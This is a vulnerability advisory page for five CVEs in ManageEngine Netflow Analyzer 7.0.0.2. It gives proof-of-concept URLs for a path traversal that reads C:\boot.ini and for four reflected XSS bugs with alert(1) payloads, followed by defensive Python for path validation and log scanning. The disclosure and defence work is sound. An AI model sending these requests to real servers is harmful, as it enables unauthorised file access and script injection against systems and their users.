"Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting"

Author: Rafael Pedrero
Platform: jsp
Release date: 2019-02-19

<!--
# Exploit Title: Path traversal vulnerability in Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8925
# Category: webapps
 
1. Description
   
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. An Absolute Path Traversal vulnerability in the Administration zone, in /netflow/servlet/CReportPDFServlet (via the parameter schFilePath), allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via any file name, such as a schFilePath=C:\boot.ini value.
 
   
2. Proof of Concept

Original request: http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\AdventNet\ME\NetFlow\help\ciscoQoS.pdf
 
Modified request: http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\boot.ini

3. Solution:
   
The product is discontinued. Update to the latest version of this product.

-->
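A defender-side check for the `schFilePath` parameter described above, added here as an example (it is not the advisory author's or the vendor's code): it normalises the Windows path and accepts it only if it stays under an allowed report root. The root `C:\AdventNet\ME\NetFlow` is taken from the original request above; the PDF-only rule, the host name and the function names are assumptions.

```python
import ntpath
from pathlib import PureWindowsPath
from urllib.parse import parse_qs, urlsplit

SERVLET = "/netflow/servlet/CReportPDFServlet"  # endpoint named in the advisory
# Assumption: legitimate reports live under the install tree seen in the
# advisory's original request, and only PDF files are ever served.
ALLOWED_ROOT = PureWindowsPath(r"C:\AdventNet\ME\NetFlow")
ALLOWED_SUFFIXES = {".pdf"}


def is_allowed_report_path(sch_file_path: str) -> bool:
    """True only if the path is absolute, a PDF, and inside ALLOWED_ROOT."""
    if not sch_file_path or "\x00" in sch_file_path:
        return False
    # Collapse "." / ".." segments and mixed separators lexically.
    path = PureWindowsPath(ntpath.normpath(sch_file_path))
    if not path.is_absolute():  # rejects relative and drive-relative ("C:x") forms
        return False
    if path.suffix.lower() not in ALLOWED_SUFFIXES:
        return False
    # PureWindowsPath compares case-insensitively, matching Windows semantics.
    return ALLOWED_ROOT in path.parents


def check_request(url: str) -> str:
    """Classify one request URL as 'allow', 'block' or 'not-applicable'."""
    parts = urlsplit(url)
    if parts.path != SERVLET:
        return "not-applicable"
    values = parse_qs(parts.query, keep_blank_values=True).get("schFilePath")
    if not values:
        return "not-applicable"
    # A repeated parameter is judged on every value, not just the first.
    return "allow" if all(map(is_allowed_report_path, values)) else "block"


if __name__ == "__main__":
    # Constructed host name; the two paths are the ones shown in the advisory.
    base = "http://netflow.example:8080" + SERVLET + "?pdf=true&schFilePath="
    for value in (r"C:\AdventNet\ME\NetFlow\help\ciscoQoS.pdf", r"C:\boot.ini"):
        print(value, "->", check_request(base + value))
```

The check is purely lexical; a deployment that can touch the filesystem should also resolve junctions and short (8.3) names before comparing.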


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8926
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/popup1.jsp file via these GET parameters: bussAlert, customDev, and selSource.

   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/popup1.jsp?selSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true

Parameters: bussAlert, customDev and selSource


3. Solution:
   
Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8927
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/scheduleConfig.jsp file via these GET parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10, and val11.

   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/scheduleConfig.jsp?rowIncrement=true&match_flag=true&removeRows=&rep_Type=cust&schSource=interface&rep_schedule=daily&performTask=&disp=&stHr=09&edHr=17&filterFlag=false&selectDeviceDone=&devSrc=auxz6%22%3e%3cscript%3ealert(1)%3c%2fscript%3etqq9idmqry5&popup=false&task=add&f=&mset=&getFilter=false&resetter=true&excWeekModify=&mailReport=true&stH=09&edH=17&boxChecked0=&selCh0=&threshRow=1&schName=www&schDesc=qqq&sourcesel=40&repType=cust&logicOp=AND&sel0=SrcAddr&val10=&rowCount=1&repSchedule=Daily&dailysel1=02&dailysel2=00&dailysel3=1&dmsg=&weeklysel1=1&weeklysel2=02&weeklysel3=00&weeklysel4=3&monthsel1=1&monthsel2=02&monthsel3=00&monthlysel4=5&repGenTime=2019-02-18+14%3A55&oncesel4=1&omsg=&mailreport=mailreport&emailId=

Parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10 and val11


3. Solution:
   
Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8928
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in /netflow/jspui/userManagementForm.jsp via these GET parameters: authMeth, passWord, pwd1, and userName.

   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/userManagementForm.jsp?moveLR=&moveRL=&moveLRIP=&moveRLIP=&moveLRBuss=&moveRLBuss=&addField=&authMeth=fgcuh%3e%3cscript%3ealert(1)%3c%2fscript%3eyxcpve1able&createRadUser=false&radSet=&userName=qqq&radiusUser=Authenticate+locally&pwd1=qqqqqq&passWord=qqqqqq&priv=Guest

Parameters: authMeth, passWord, pwd1 and userName


3. Solution:
   
Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->


<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8929
# Category: webapps
 
1. Description
 
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/selectDevice.jsp file in these GET parameters: param and rtype.
   
2. Proof of Concept
 
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=collopts&param=g3oxp%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C!--q5uad

Parameters: param and rtype


3. Solution:
   
Update to the latest version of this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->
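The four XSS entries above share one pattern: GET parameters on specific pages are reflected unencoded. The following added example (not part of the original advisory) scans access-log lines for requests to those pages whose listed parameters carry HTML metacharacters. The endpoints and parameter names are the ones listed above; the log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Endpoint -> reflected GET parameters, exactly as listed in the advisory.
REFLECTED = {
    "/netflow/jspui/popup1.jsp": {"bussAlert", "customDev", "selSource"},
    "/netflow/jspui/scheduleConfig.jsp": set(
        "devSrc emailId excWeekModify filterFlag getFilter mailReport mset popup "
        "rep_schedule rep_Type schDesc schName schSource selectDeviceDone task "
        "val10 val11".split()),
    "/netflow/jspui/userManagementForm.jsp": {"authMeth", "passWord", "pwd1", "userName"},
    "/netflow/jspui/selectDevice.jsp": {"param", "rtype"},
}
# Characters that let a reflected value break out of an HTML tag or attribute.
MARKUP = re.compile(r'[<>"]')
# Assumption: access log in common/combined format with a quoted request line.
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, harmless markup).
SAMPLE_LOG = [
    '198.51.100.7 - admin [18/Feb/2019:14:55:01 +0000] "GET /netflow/jspui/popup1.jsp?selSource=2&customDev=true&bussAlert=true HTTP/1.1" 200 5120',
    '198.51.100.7 - admin [18/Feb/2019:14:55:09 +0000] "GET /netflow/jspui/selectDevice.jsp?rtype=collopts&param=x%22%3E%3Cb%3E HTTP/1.1" 200 4096',
    '198.51.100.7 - admin [18/Feb/2019:14:55:20 +0000] "GET /netflow/jspui/userManagementForm.jsp?authMeth=a%3Cb&userName=qqq&priv=%3Cx%3E HTTP/1.1" 200 7300',
    '198.51.100.7 - admin [18/Feb/2019:14:55:31 +0000] "GET /netflow/jspui/index.jsp?q=%3Cb%3E HTTP/1.1" 200 900',
]


def scan(log_lines):
    """Return (line_no, endpoint, parameter) for each suspicious reflected value."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        watched = REFLECTED.get(target.path)
        if not watched:
            continue  # not one of the pages named in the advisory
        # parse_qsl percent-decodes once, as the servlet container would.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if name in watched and MARKUP.search(value):
                findings.append((line_no, target.path, name))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Password fields (`passWord`, `pwd1`) can legitimately contain these characters, so hits on them need manual review.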